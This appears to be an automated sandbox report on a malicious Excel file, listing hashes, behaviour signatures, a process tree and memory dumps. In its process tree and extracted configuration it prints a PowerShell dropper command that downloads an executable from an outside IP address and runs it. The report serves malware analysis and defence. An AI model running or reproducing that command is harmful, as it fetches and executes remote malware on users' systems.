Analysis

  • max time kernel
    186s
  • max time network
    192s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    25-11-2022 21:40

General

  • Target

    7ba4185afb16c7ca54fbb488a2d19e55825a3de688baed1d5497964711edd199.xls

  • Size

    25KB

  • MD5

    f1c80a738722554b91452c59adb2f27d

  • SHA1

    a768bd41c189e9304d17c7dbf697a1d04971d441

  • SHA256

    7ba4185afb16c7ca54fbb488a2d19e55825a3de688baed1d5497964711edd199

  • SHA512

    e31c0e292abe32777190475267897a6ffac2c1613971a33c3fe28a66e6c33f03b41bfaf9092a1db2d45618d2c7edd8339c10ef92fe784e4c993bd8533d0f2600

  • SSDEEP

    192:1Ha439gyLPUV+/T/D/Ns0+PKY1l6Lpb9KX+lTf5eKIHiZyFwDRa:A+Lb60+eh9iefY

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://92.63.87.40/aksjdderwd/asdbwk/dhoei.exe

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\7ba4185afb16c7ca54fbb488a2d19e55825a3de688baed1d5497964711edd199.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4016
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://92.63.87.40/aksjdderwd/asdbwk/dhoei.exe','%TEMP%\oUhjidsf.exe');Start-Process '%TEMP%\oUhjidsf.exe';
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:3068
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://92.63.87.40/aksjdderwd/asdbwk/dhoei.exe','C:\Users\Admin\AppData\Local\Temp\oUhjidsf.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\oUhjidsf.exe';
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2340

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2340-144-0x00007FFF2F170000-0x00007FFF2FC31000-memory.dmp
    Filesize

    10.8MB

  • memory/2340-142-0x00007FFF2F170000-0x00007FFF2FC31000-memory.dmp
    Filesize

    10.8MB

  • memory/2340-140-0x0000000000000000-mapping.dmp
  • memory/2340-143-0x00007FFF2F170000-0x00007FFF2FC31000-memory.dmp
    Filesize

    10.8MB

  • memory/2340-141-0x00000165CC140000-0x00000165CC162000-memory.dmp
    Filesize

    136KB

  • memory/3068-139-0x0000000000000000-mapping.dmp
  • memory/4016-136-0x00007FFF17CF0000-0x00007FFF17D00000-memory.dmp
    Filesize

    64KB

  • memory/4016-138-0x00007FFF15A20000-0x00007FFF15A30000-memory.dmp
    Filesize

    64KB

  • memory/4016-133-0x00007FFF17CF0000-0x00007FFF17D00000-memory.dmp
    Filesize

    64KB

  • memory/4016-134-0x00007FFF17CF0000-0x00007FFF17D00000-memory.dmp
    Filesize

    64KB

  • memory/4016-137-0x00007FFF15A20000-0x00007FFF15A30000-memory.dmp
    Filesize

    64KB

  • memory/4016-135-0x00007FFF17CF0000-0x00007FFF17D00000-memory.dmp
    Filesize

    64KB

  • memory/4016-132-0x00007FFF17CF0000-0x00007FFF17D00000-memory.dmp
    Filesize

    64KB

  • memory/4016-146-0x00007FFF17CF0000-0x00007FFF17D00000-memory.dmp
    Filesize

    64KB

  • memory/4016-147-0x00007FFF17CF0000-0x00007FFF17D00000-memory.dmp
    Filesize

    64KB

  • memory/4016-148-0x00007FFF17CF0000-0x00007FFF17D00000-memory.dmp
    Filesize

    64KB

  • memory/4016-149-0x00007FFF17CF0000-0x00007FFF17D00000-memory.dmp
    Filesize

    64KB